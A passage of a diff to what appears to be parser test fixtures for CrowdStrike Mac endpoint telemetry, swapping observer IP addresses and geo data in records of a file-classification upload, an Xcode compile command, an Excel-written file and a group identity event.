7ef9e3d5c09813e8361133cdba0a53f485f073ba023213d191bc53e69fbe73c4059213f04dd2f3c9835163e0865953be38a7e3d0385c63ee1b08a3f142c3d3e2f9db23df0068e3cff6d333df06f693d9e7ea63b68fb013c4250723d8a4d2b3c0b007a3d2e924f3cea209b3d094c443faccccd3f50ded32e0d9dfa3df41f213b2dab9f3cf95d4f3d94a4d33d7991bc3de809d53eb532613e28db8c3c1afe1e3f7cd9e83eb0ff974010f0d83cfc3b4f3c2e53653b0ede553db6c3763e6bb98c3d35f1bf3d1a95423c53d85a3bcedd483c46bce83ded5cfb3d8ac0833bd0edc43c319a413d1e30013dd07c853cdcf0303ce243573f4ded293f69c77a3f13d70a3f036e2f3f036e2f3feaa3053e361134404d8c7e3df5c28f3ef02de03faa57a83e70d845402f5dcc3eb8e2193f62339c3df0068e3f204189400de9e23fe010623f90be0e3f6a233a3e7333333f4a85883f3318fc3e4000003e063f143f1b851f3ecb5dcc3e9333333ed446743f0e560440889ba64065d2f2ad8f49d23f573eab3dbeff193ed7f62b3f3f3b643eedab9f3f57d567409780343f9292a33e8395814041158c3f90a71e40d717593e832ca53e1a511a3c74c6e73f64c2f83f832cf93f26e9793f03a92a3e6872b03df34d6a3e884b5e3f3381d83ea20c4a3e1a02753e2353f83e825aee3f4d013b3f041f213ec240b83c6a4a8c3cf3a14d3d15b5743c091e213d059c8d3e08ce703c2f78ff3f0837b53b6a7ce13b815e393ded91683ba9cdc43e2d42c43b73dc053d6147aebb8438093c0a61173ea72b023edf559b3dcaff6dbc1bd4063c21fd153d39ffd63d128e0d398d4bad3b894c443d4f18013a195aafbc5773193af57f7339ce41413f6851ec3f0fec57ae9dfa533cfa58f73a5a0d27bc21943a3ca1dfb9ba5471063d0e56043f7dd2f23dd1b7173c14b3813f33dd983ef013a9400347d83c4ca2db3b245d42bb8733663ce243573e1b22d13bf47b673b0f32383c928e0d3c4059213b6304473d05143c3d176ddbba9aed573b3220793c3c6a7f3ccc4ef93b267621ba298e0334f8d6f4bcba493d35461af9342ca85e34c11ccb352222903385f5c5368e9b3935b2c72cbbb75ea6344cfa3134553ec134b523e734c2b91cbba8e2e3bc4df26734d636243705eeb9351ad56535332082be173eabbc11ea79bbb3d4ae35a82cc133a943c13046530d34fd74ee34677fadbcf27bb3bbad8a11bc4669053496f7d53580f4d6af1848493405e546338e0e59bd23ad193400bddcbd2bb44e33bf0a473927249d34c2822235531fdebb73ba773c626d4836cf4407330f9fab31d582ecbc1a027535b8af0035d13ed5b85ad11cbcc582563573cb0735d499d3319cda2abc8548aa3474d02abba593a3351ccb0c2f713b9cbd14a4d333605e7dbca3ec033d6108c43dc9e4503dba34443ca454de3d5a511a3e84816f3cdc09813f4773193bac3a863d1945b73e6b1c433c48de2b3f03e4263c9a415f3e08b4393bd8ba413d0073583ee1cac13f13a92a3e2e48e93df318fc3d0216c63df212d73d9d7dbf3b627e0f3c44ef893d8ba1f53c03e8573d2c9afe3ce5f30e3d0846203fac710d3f50c49c2e0d4f2a3df487fd3b306c443cf837b53d96ffc13d795d4f3de8db8c3eb4bc6a3e28a71e3c1fba453f7c56d63eb07c854010c63f3cfeb0753c3170503b0e68e43db977853e6bb98c3d3c7f783d19a4163c55f99c3bd1e96c3c4669053debb98c3d8a6ca03bde43ee3c2efb2b3d2007dd3dce075f3cdbb59e3ce75793b01aa501\",\"event_simpleName\":\"DeliverLocalFXToCloud\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"208.237.139.168\",\"ModelPrediction\":\"1436899696705536\",\"SHA256HashData\":\"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2\",\"Malicious\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"FeatureExtractionVersion\":\"2\",\"event_platform\":\"Mac\",\"FXFileSize\":\"502032\",\"Entitlements\":\"15\",\"name\":\"DeliverLocalFXToCloudMacV4\",\"PupAdwareDecisionValue\":\"12384657383358464\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"PupAdwareConfidence\":\"0\",\"EffectiveTransmissionClass\":\"1\",\"aid\":\"ffffffff45d647e6ae0ba8764a4bd570\",\"MLModelVersion\":\"4\",\"timestamp\":\"1625677489052\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150848500Z", + "original": "{\"FeatureVector\":\"000000527b2276223a22312e30222c226e223a352c226c223a3235362c2265223a7b2261223a5b31363737373232332c31363737373232332c31363737373232332c31363737373232332c31363737373232335d7d7d3f48793e3f6837b53f276c8b3ef8d4fe3f036e2f3fdb404f3e361134404d8c7e3df27bb33ef837b53faa57a83e752546402e6b513eb8e2193f5e63203e1446743f295e9e401fb7e93fe010623f90be0e3f6f837b3e7333333f3951833f33afb83e3f62b73e1893753f1b851f3ea752543e9333333ed446743f045a1d40889ba64065d2f2ad9a1b883f573eab3dd773193ed254613f3f3b643eedab9f3f579a6b4082b5dd3f92d42c3e8809d54040fcf83f90a71e40d717593e832ca53e19e83e3b4b295f3f64c2f83f8a9d1f3f27fcb93f088ce73e7333333de944673e81d7dc3f2db22d3e90cb293e2ca57a3e22b6ae3e843fe63f44fdf43f0573eb3ecbc6a83c648e8a3ceb1c433d16c6153c0d4fdf3d0529353e08ce703c2d81ae3f0809d53b69a2c63b7b43d93ded91683ba90cd43e2f9db23b6e28673d646499bb84406c3c0bd6623ea809d53edfb15b3dcc73acbc188d2a3c20cae63d390eaa3d148fda398cfb263b872b023d4d2b2c3a19c60fbc58ec963af9b13139f75bed3f687fcc3f105bc0ae9de3cf3cfb15b53a5dcccfbc2398203c9f40a3ba91e2153d0ec95c3f7e00d23dd048173c13b7d83f3404ea3ef06f69400392643c4dc8753b1f9485bb875d573cdebd903e1a9fbe3be83a113b1528f23c9279143c40053e3b62089e3d06ec183d16e58aba9c7ffe3b30c0273c3cbe623cc9eecc3b1e55c1ba25558f35192b55bcba493d357b1f123422c77e35700fd4349540073385f5c53562b199363180c1bbb5f5f133702cb134553ec134453f1234dfedcabba8e2e3bc4df26734da8f6636e51c133592f7ea34116278be173eabbc11ea79bbb3d4ae3574e4c733a4bbc53046530d34fd74ee330432f8bcf212d7bbaf3e47bc46690534a8a19335420670af1ab38734cdff54338e0e59bd23ad1934a8bd10bd2bb44e3433be90390220d73590265c3481ec3abb7701543b3e1eb437841ede333ede4c31d582ecbc195ee13510b6ab35ab6563b85ae696bcc582563510d9083490265c319cda2abc8327673428415ebba593a3347763df2f713b9cbd14a4d33486ea69bca3ec033d58ec963dc523f63dba7daa3cab9f563d5c67e03e8425af3cdaf8df3f47381d3bab606b3d174e663e6b1c433c4710cb3f04d0143c9691a73e0a233a3bde2ac33d0240b83ee339c13f139c0f3e2fec573df34d6a3d00e6b03df1a9fc3d9fb3fa3b6629953c4100e73d89fe873c0811b23d2d2dcb3ce5de163d0a1dfc3fac816f3f5096bc2e0d65af3df559b43b38ae323cf6555c3d93c3613d78a0903de872b03eb439583e27ef9e3c1689443f7c8b443eb06f694010ce703cff822c3c2d81ae3b0e68e43db5e2043e6b367a3d355ef23d1b089a3c5898b33bd373b03c41d29e3decbfb13d8a0e413bd9dfdb3c2dab9f3d1fddec3dcdd2f23cd10f523ce9ccb83f4b2fec3f7119ce3f276c8b3ee831273f036e2f3fe58adb3e361134404d8c7e3df972473ef837b53faab3683e7f1412402f34d73eb8e2193f62339c3e1446743f2041894013e0df3fe010623f90be0e3f6f837b3e7333333f449ba63f30a3d73e3f62b73e1893753f1b851f3ee240b83e9333333ed446743f03d07d40889ba64065d2f2ad8f49d23f4fd8ae3dd14e3c3edde69b3f3e147b3ee5bc023f579a6b409780343f92d42c3e8809d540435f703f90a71e40d717593e832ca53e19b3d03cc13fd13f6374bc3f8a9d1f3f27fcb93f1cd35b3e7333333de388663e884b5e3f29999a3e90cb293e2305533e2147ae3e843fe63f4d013b3f056d5d3ebe28243c6703b03cf084623d14a4d33c093b7e3d05a7093e087fcc3c304ab63f08c7e33b6ad0c43b8893b83dec22683ba8e2e33e2c56d63b6cd8dc3d637de9bb849cb23c08e79b3ea6dc5d3ee00d1b3dcb923abc1fd36f3c1cf56f3d385c683d134acb398c098e3b872b023d4e075f3a108bd4bc564d7f3b029cfe399cd0863f6958103f10b780ae9e16793cf601793a58523cbc231e7e3c9eecc0ba8398a63d0fba883f7d63883dd254613c14c4483f349ba63ef0b0f24003aa263c49afe23b23d70abb875d573cde3fbc3e1a9fbe3bebcc6c3b19d0203c92641b3c402f303b62d1f23d0366513d1797ccba9f40a33b32c83f3c39a1773ccfe9b83b2276b8ba786f1235192b55bcb890d63573a8ab34a531f734c11ccb3495400732a151a8369df96936179953bbbc1f00340207b734553ec134b523e7352bd356bba8e2e3bc4df26733a7cdeb36e51c1335421b0e3515c299be173eabbc11e647bbb3d4ae328448f533aa5c213046530d357f25dd330432f8bcf290acbbae9ee4bc4669053496f7d534ede333af1ab38733a03ec7346522f2bd23ad19353fd9cfbd2bb44e3392336039250bbe34bb34f73618f0ecbb7701543c50e560356884d0330f9fab31d582ecbc19f5e03510b6ab34e35d66b85ac660bcc582563510d9083490265c3399a707bc84a0e43474d02abba593a3342f209630b98ae7bd11fb4033605e7dbc9e59f33d5f11733dc922533db943183ca5a46a3d5b42463e83bcd33cdd2f1b3f47fcb93bae3a3b3d1ceaf23e6978d53c4836653f03a29c3c9afe1e3e096bba3bde76423cfd4bf13ee1e4f73f1418933e2ee6323df1a9fc3cfe1da83df0d8453d9e7ea63b69f6a93c4083123d8a7c5b3c0266773d2e147b3ce978d53d08ce703facf41f3f510cb32e0d9dfa3df2b0213b2bd5dc3cf77af63d94ee393d782d383de978d53eb404ea3e288ce73c2209ab3f7c91d13eb0d8454010e2193cfc65413c2e53653b0ede553db674d13e6ae7d53d361bb03d1c23b83c579d0a3bd3176a3c4447c33dea161e3d8a67623bd477bc3c2f4f0e3d1e6eeb3dd07c853cd4e8fb3cded2893f42de013f6d4fdf3f276c8b3ee1e4f73f036e2f3fe58adb3e361134404d8c7e3df837b53ef18fc53faa57a83e781d7e402d53263eb8e2193f62339c3e1b089a3f204189400eb9f53fe010623f9395813f6a233a3e81ff2e3f41a9fc3f3013a93e2666663e17dbf53f1b851f3ec666663e9333333ed446743f0e560440889ba64065d2f2ad9a1b883f573eab3dd7a7873edde69b3f3f3b643eed42c43f6a30554087f62b3f92d42c3e83958140435f703f90a71e40d717593e832ca53e19ce073cd0917d3f6374bc3f8a9d1f3f26e9793f088ce73e7333333df34d6a3e8710cb3f34f7663ea20c4a3e1a02753e23bcd33e843fe63f3a36e33f0573eb3ec84b5e3c6685db3cef0ae53d17acc53c0b32cf3d05681f3e0831273c2ff6d33f0a29c73b6a9e6f3b88c60d3deecbfb3baa53fc3e2d91683b6c636b3d66d9bebb8533b13c0a0d353ea91d153ee275253dcc9d9dbc159e623c1d27c43d3ad18d3d145b6c3982b47b3b88051d3d4fe9b83a12e7cfbc579d0a3af0a5f0390a9f2b3f69db233f10b780ae9e5a073cfc26573a5a6b1bbc247ed03c9d7343ba9bb6aa3d0f66a53f7d49523dd35a863c151c5c3f35b5743ef1d14e40047f243c4d9e843b24095fbb87b99d3cdd82fd3e1c28f63beeae9f3b14812c3c91a75d3c40ad043b613f4b3d033c603d195033ba9d8c6d3b307d0b3c3d12453cd234ec3b25375dba904f6e35181195bcba493d35a2674934a531f7352bda363522229033be54dc337b157336151dabbbb5f5f1340207b7345d30d93421b49d34c2b91cbba8e2e3bc4df26733a7cdeb369116e13592f7ea34116278be173eabbc11e647bbb3d4ae328448f533b7f4153046530d359e3e2233d006d8bcf2cf96bbad9ad8bc466905351da01436249e38af17834033a03ec7346522f2bd1ddc1e35d36497bd2bb44e33bf0a47390220d734c2822235531fdebb73ba773c1888f8356884d0330f9fab31d533c2bc195ee135adf23935ab6563b85b06ccbcc84b5e3510d9083490265c33e590e6bc81450f33ce498bbba593a334d1f8602f713b9cbd1930be33605e7dbca3ec033d5d249e3dc85b183dbc115e3ca858793d5c33723e83afb83cdcc63f3f4916873bab47413d1cb6853e6b9f563c49320e3f03eab33c9afe1e3e0aa64c3bdfd6953cfac1d33ee3e4263f14af4f3e2f69443df3b6463cfeda663df2b0213d9faebc3b50678c3c4250723d8c00543c0151a43d2d0e563ce4f7663d0701113fad2bd43f5075f72e0e19d33df5f6fd3b2eb80f3cf487fd3d92e72e3d7842313de944673eb50b0f3e295e9e3c1fd36f3f7d6a163eb15b57401159b43d000a7c3c2d2dcb3b0ecd8e3db4e11e3e6c3c9f3d3adc0a3d1bb0603c52dcb13bd338f83c4100e73de9e1b13d8b53503bd6ece13c2cd9e83d201cd63dd1b7173cda12303cdc725c3f48793e3f6ded293f276c8b3f036e2f3f036e2f3fea0f913e361134404d8c7e3e0189373ef837b53fabc3613e7f62b7403012063eb79a6b3f5e63203e0d4fdf3f204189400de9e23fe010623f90be0e3f6a233a3e81ff2e3f3951833f30902e3e4275253e18793e3f1b851f3ee0f9093e9333333ed446743f045a1d40889ba64065d2f2ad9d19253f573eab3dc692f73ece21963f3f3b643eee2eb23f579a6b407e76c93f92d42c3e83958140435f703f90a71e40d717593e832ca53e25aee63cb7e9103f64c2f83f8a9d1f3f27fcb93f06a7f03e676c8b3de147ae3e884b5e3f27bb303e90cb293e3295ea3e21e4f73e81205c3f3fec573f0573eb3ebec56d3c633eff3cf1800a3d1389b53c0ac1903d0587943e06dc5d3c2efb2b3f095e9e3b67ddca3b80303c3dec8b443ba782903e30068e3b6bcc6c3d619b91bb836eb53c0bf7f03ea60aa63ee00d1b3dcc447cbc28c1553c1d55e73d36e2eb3d132b56399063903b8776813d4d7f0f3a15a1bdbc55cfab3b06f04a39c25a833f68f5c33f107c85ae9e10d83cf9335d3a594a8abc2276b83c9f16b1ba66e57d3d0e0c9e3f7dbf483dd1b7173c1435ad3f34bc6a3ef096bc4003689d3c49afe23b22fcf0bb87a8d63cde939f3e1aee633bedbb5a3b14f69d3c91e6473c402f303b64217d3d06cca33d183516ba9fe8683b33d4ae3c38f9b13cced9173b288f00ba5a42d7356eda97bcb9628d356e0c6f341b95cf341f3c6534ad5b0a32a151a8337b157335b2c72cbbb2852334900adf34553ec1346e5ee5347ab7febba8e2e3bc4df26733a7cdeb35cf19143592f7ea34c9a612be173eabbc11e647bbb3d4ae35219fff33b7f4153046530d348b7aa434677fadbcf290acbbaf2d80bc46690535a6b2cc3206f2a8af17834033a03ec7338e0e59bd1e83e435857ac3bd2bb44e33043df73927249d34bb34f735906b14bb780dc33c50e560361e0a98336f92c2320a0eb4bc19b2c435adf23935ab6563b85a4586bcc56d5d3510d9083490265c3399a707bc811b1e34cde3d7bba593a334aec0612fb676c6bd13be2333605e7dbca3ec033d59be4d3dc9667b3db83cf33ca7ef9e3d5c09813e8361133cdba0a53f485f073ba023213d191bc53e69fbe73c4059213f04dd2f3c9835163e0865953be38a7e3d0385c63ee1b08a3f142c3d3e2f9db23df0068e3cff6d333df06f693d9e7ea63b68fb013c4250723d8a4d2b3c0b007a3d2e924f3cea209b3d094c443faccccd3f50ded32e0d9dfa3df41f213b2dab9f3cf95d4f3d94a4d33d7991bc3de809d53eb532613e28db8c3c1afe1e3f7cd9e83eb0ff974010f0d83cfc3b4f3c2e53653b0ede553db6c3763e6bb98c3d35f1bf3d1a95423c53d85a3bcedd483c46bce83ded5cfb3d8ac0833bd0edc43c319a413d1e30013dd07c853cdcf0303ce243573f4ded293f69c77a3f13d70a3f036e2f3f036e2f3feaa3053e361134404d8c7e3df5c28f3ef02de03faa57a83e70d845402f5dcc3eb8e2193f62339c3df0068e3f204189400de9e23fe010623f90be0e3f6a233a3e7333333f4a85883f3318fc3e4000003e063f143f1b851f3ecb5dcc3e9333333ed446743f0e560440889ba64065d2f2ad8f49d23f573eab3dbeff193ed7f62b3f3f3b643eedab9f3f57d567409780343f9292a33e8395814041158c3f90a71e40d717593e832ca53e1a511a3c74c6e73f64c2f83f832cf93f26e9793f03a92a3e6872b03df34d6a3e884b5e3f3381d83ea20c4a3e1a02753e2353f83e825aee3f4d013b3f041f213ec240b83c6a4a8c3cf3a14d3d15b5743c091e213d059c8d3e08ce703c2f78ff3f0837b53b6a7ce13b815e393ded91683ba9cdc43e2d42c43b73dc053d6147aebb8438093c0a61173ea72b023edf559b3dcaff6dbc1bd4063c21fd153d39ffd63d128e0d398d4bad3b894c443d4f18013a195aafbc5773193af57f7339ce41413f6851ec3f0fec57ae9dfa533cfa58f73a5a0d27bc21943a3ca1dfb9ba5471063d0e56043f7dd2f23dd1b7173c14b3813f33dd983ef013a9400347d83c4ca2db3b245d42bb8733663ce243573e1b22d13bf47b673b0f32383c928e0d3c4059213b6304473d05143c3d176ddbba9aed573b3220793c3c6a7f3ccc4ef93b267621ba298e0334f8d6f4bcba493d35461af9342ca85e34c11ccb352222903385f5c5368e9b3935b2c72cbbb75ea6344cfa3134553ec134b523e734c2b91cbba8e2e3bc4df26734d636243705eeb9351ad56535332082be173eabbc11ea79bbb3d4ae35a82cc133a943c13046530d34fd74ee34677fadbcf27bb3bbad8a11bc4669053496f7d53580f4d6af1848493405e546338e0e59bd23ad193400bddcbd2bb44e33bf0a473927249d34c2822235531fdebb73ba773c626d4836cf4407330f9fab31d582ecbc1a027535b8af0035d13ed5b85ad11cbcc582563573cb0735d499d3319cda2abc8548aa3474d02abba593a3351ccb0c2f713b9cbd14a4d333605e7dbca3ec033d6108c43dc9e4503dba34443ca454de3d5a511a3e84816f3cdc09813f4773193bac3a863d1945b73e6b1c433c48de2b3f03e4263c9a415f3e08b4393bd8ba413d0073583ee1cac13f13a92a3e2e48e93df318fc3d0216c63df212d73d9d7dbf3b627e0f3c44ef893d8ba1f53c03e8573d2c9afe3ce5f30e3d0846203fac710d3f50c49c2e0d4f2a3df487fd3b306c443cf837b53d96ffc13d795d4f3de8db8c3eb4bc6a3e28a71e3c1fba453f7c56d63eb07c854010c63f3cfeb0753c3170503b0e68e43db977853e6bb98c3d3c7f783d19a4163c55f99c3bd1e96c3c4669053debb98c3d8a6ca03bde43ee3c2efb2b3d2007dd3dce075f3cdbb59e3ce75793b01aa501\",\"event_simpleName\":\"DeliverLocalFXToCloud\",\"ConfigStateHash\":\"1620585913\",\"aip\":\"67.43.156.14\",\"ModelPrediction\":\"1436899696705536\",\"SHA256HashData\":\"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2\",\"Malicious\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"FeatureExtractionVersion\":\"2\",\"event_platform\":\"Mac\",\"FXFileSize\":\"502032\",\"Entitlements\":\"15\",\"name\":\"DeliverLocalFXToCloudMacV4\",\"PupAdwareDecisionValue\":\"12384657383358464\",\"id\":\"ffffffff-1111-11eb-b44e-069a02b0ad6b\",\"PupAdwareConfidence\":\"0\",\"EffectiveTransmissionClass\":\"1\",\"aid\":\"ffffffff45d647e6ae0ba8764a4bd570\",\"MLModelVersion\":\"4\",\"timestamp\":\"1625677489052\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "id": "ffffffff-1111-11eb-b44e-069a02b0ad6b", "created": "2021-07-07T17:04:49.052Z" }, @@ -3768,21 +3287,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "Canada", - "location": { - "lon": -79.3716, - "lat": 43.6319 - }, - "country_iso_code": "CA" - }, - "address": "208.114.159.32", - "vendor": "crowdstrike", - "ip": "208.114.159.32", "serial_number": "ffffffffb3a3442585c05abc61e290fc", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:24.929Z", "file": { @@ -3796,18 +3306,18 @@ }, "related": { "hosts": [ - "208.114.159.32" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.114.159.32" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465732600Z", - "original": "{\"event_simpleName\":\"CreateProcessArgs\",\"ContextTimeStamp\":\"1625677524.929\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365035560818271291\",\"ContextThreadId\":\"365035560818271291\",\"aip\":\"208.114.159.32\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"CommandLine\":\"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore -index-system-modules\",\"Entitlements\":\"15\",\"name\":\"CreateProcessArgsMac\",\"id\":\"ffffffff-1111-11eb-8332-020506b18db5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffb3a3442585c05abc61e290fc\",\"timestamp\":\"1625677525128\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend\"}", + "ingested": "2021-12-09T13:36:11.150854800Z", + "original": "{\"event_simpleName\":\"CreateProcessArgs\",\"ContextTimeStamp\":\"1625677524.929\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365035560818271291\",\"ContextThreadId\":\"365035560818271291\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"CommandLine\":\"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore -index-system-modules\",\"Entitlements\":\"15\",\"name\":\"CreateProcessArgsMac\",\"id\":\"ffffffff-1111-11eb-8332-020506b18db5\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffb3a3442585c05abc61e290fc\",\"timestamp\":\"1625677525128\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend\"}", "created": "2021-07-07T17:05:25.128Z", "kind": "state", "action": "CreateProcessArgs", @@ -3845,21 +3355,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.15.11.8", - "vendor": "crowdstrike", - "ip": "208.15.11.8", "serial_number": "ffffffffc4044541995bffd84b9df003", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:04:48.523Z", "file": { @@ -3874,18 +3375,18 @@ }, "related": { "hosts": [ - "208.15.11.8" + "67.43.156.13" ], "hash": [ "3090255842" ], "ip": [ - "208.15.11.8" + "67.43.156.13" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465739400Z", - "original": "{\"event_simpleName\":\"PdfFileWritten\",\"ContextTimeStamp\":\"1625677488.523\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364156540965623394\",\"ContextThreadId\":\"0\",\"aip\":\"208.15.11.8\",\"FileIdentifier\":\"05000001000000000000000000000000f1321d0000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PdfFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8903-022a1941b91f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffc4044541995bffd84b9df003\",\"timestamp\":\"1625677488576\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95\"}", + "ingested": "2021-12-09T13:36:11.150861Z", + "original": "{\"event_simpleName\":\"PdfFileWritten\",\"ContextTimeStamp\":\"1625677488.523\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"364156540965623394\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.13\",\"FileIdentifier\":\"05000001000000000000000000000000f1321d0000000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"PdfFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-8903-022a1941b91f\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffc4044541995bffd84b9df003\",\"timestamp\":\"1625677488576\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95\"}", "created": "2021-07-07T17:04:48.576Z", "kind": "event", "action": "PdfFileWritten", @@ -3917,21 +3418,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.165.30.176", - "vendor": "crowdstrike", - "ip": "208.165.30.176", "serial_number": "ffffffff44564c2f8d76394cb25c31ab", + "address": "67.43.156.13", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.13" }, "@timestamp": "2021-07-07T17:04:38.379Z", "ecs": { @@ -3942,19 +3434,19 @@ "user2" ], "hosts": [ - "208.165.30.176" + "67.43.156.13" ], "hash": [ "3967242894" ], "ip": [ - "208.165.30.176" + "67.43.156.13" ] }, "event": { "action": "GroupIdentity", - "ingested": "2021-11-22T09:23:55.465746100Z", - "original": 